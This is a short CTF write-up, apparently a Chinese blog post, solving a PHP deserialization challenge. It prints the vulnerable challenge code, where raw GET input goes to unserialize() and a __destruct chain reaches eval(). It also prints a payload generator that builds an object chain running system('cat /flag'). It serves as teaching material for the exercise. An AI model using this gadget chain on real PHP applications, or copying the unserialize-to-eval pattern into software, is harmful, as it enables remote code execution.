【PolarCTF】bllbl_ser1

很基础的一道题

复制代码
class bllbl{
    public $qiang;//我的强
    function  __destruct(){
        $this->bllliang();
    }
    function bllliang(){
        $this->qiang->close();
    }
    }
    class bllnbnl{
     public $er;//我的儿
    function close(){
        eval($this->er);
    }
    }
    if(isset($_GET['blljl'])){
        $user_data=unserialize($_GET['blljl']);
    }

payload如下

复制代码
<?php

class bllbl{
    public $qiang;//我的强
    
    }
class bllnbnl{
    public $er;    }
    
$a = new bllbl();
$b = new bllnbnl();
$a->qiang = $b;
$b->er = "system('cat /flag');";

echo urlencode(serialize($a));

?>

这道题的一些知识点

代码可以只打我们需要的部分

从payload可以看到,我们只需要构造我们需要的部分,class的其他部分可以删除

复制代码
<?php

class bllbl{
    public $qiang;//我的强
    
    }
class bllnbnl{
    public $er;    }

通过eval运行的时候代码后面要加;

在做的过程中犯了一个小毛病,就是system后面没有加; 导致payload一直没打成功

复制代码
$b->er = "system('cat /flag');";
相关推荐
lisw0512 小时前
数字断点如何影响供应链——并危及全球经济?
网络安全·网络攻击模型·前沿领域
sbjdhjd16 小时前
云安全 | Docker 容器逃逸复盘(二):2375 未授权接口如何突破容器管理边界
网络安全·docker·云原生·数据挖掘·开源·云计算·云安全
HackTwoHub16 小时前
Clown SRC skill第二代2.x最新版企业安全研究 Skill|证据优先的 SRC 与白盒审计工作流正式更新
网络·安全·web安全·网络安全·系统安全·密码学·安全架构
白帽攻防录16 小时前
SRC 挖洞:Certighost AD CS 域控制器伪造深度复盘,CVE-2026-54121 一个普通域用户怎么拿走整个企业域
网络·安全·web安全·网络安全·域安全
lisw0520 小时前
数字韧性:企业如何应对数字断点?
网络安全·网络攻击模型·前沿领域
白帽攻防录21 小时前
SRC 挖洞:Claude Code Action 供应链 RCE 深度复盘,CVE-2026-47751 一个 PR 怎么偷走你所有 CI/CD 密钥
网络安全·ci/cd·供应链安全
菩提小狗21 小时前
每日安全情报报告 · 2026-10-06
网络安全·漏洞·cve·安全情报·每日安全
学逆向的1 天前
win32文件系统
网络安全·api·win32
Chengbei112 天前
拒绝无效洞!蚂蚁Src榜一Clown 2.0 SRC SKill 第二代带状态闭环的白盒 & 黑盒审计 Skill
网络·人工智能·安全·web安全·网络安全·自动化·安全架构
XLYcmy2 天前
PDF 论文处理器 — 优势与功能文档
大数据·python·网络安全·pdf·dify·rag·漏洞检测